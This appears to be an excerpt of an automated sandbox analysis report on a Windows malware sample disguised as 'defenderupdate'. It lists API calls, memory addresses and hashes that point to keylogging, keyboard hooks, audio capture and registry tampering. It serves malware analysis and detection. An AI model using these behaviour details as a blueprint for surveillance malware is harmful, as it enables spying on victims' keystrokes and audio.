                                                                                                • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-0
                                                                                                • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleOpenProcess
                                                                                                • String ID:
                                                                                                • API String ID: 39102293-0
                                                                                                • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventTick
                                                                                                • String ID: >G
                                                                                                • API String ID: 180926312-1296849874
                                                                                                • Opcode ID: b0b89bb9bd8beed4b151c2787d9a90afc158e6c87396da72b4235c54ae8532de
                                                                                                • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                • Opcode Fuzzy Hash: b0b89bb9bd8beed4b151c2787d9a90afc158e6c87396da72b4235c54ae8532de
                                                                                                • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Info
                                                                                                • String ID: $fD
                                                                                                • API String ID: 1807457897-3092946448
                                                                                                • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 481472006-1507639952
                                                                                                • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                                • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                                • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                • API String ID: 481472006-2430845779
                                                                                                • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                                                                • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                                                                • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 1623830855-1496645233
                                                                                                • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                                                • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                                                • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                APIs
                                                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                • String ID: T=G
                                                                                                • API String ID: 2315374483-379896819
                                                                                                • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                APIs
                                                                                                • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocaleValid
                                                                                                • String ID: IsValidLocaleName$j=D
                                                                                                • API String ID: 1901932003-3128777819
                                                                                                • Opcode ID: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                                                                • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                • Opcode Fuzzy Hash: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                                                                • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00448825
                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                                • String ID: `@$`@
                                                                                                • API String ID: 1353095263-20545824
                                                                                                • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,J@4fF,00412951,00000000,00000000,J@4fF,?,00000000), ref: 00412988
                                                                                                • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00412998
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteOpenValue
                                                                                                • String ID: J@4fF
                                                                                                • API String ID: 2654517830-1060276034
                                                                                                • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759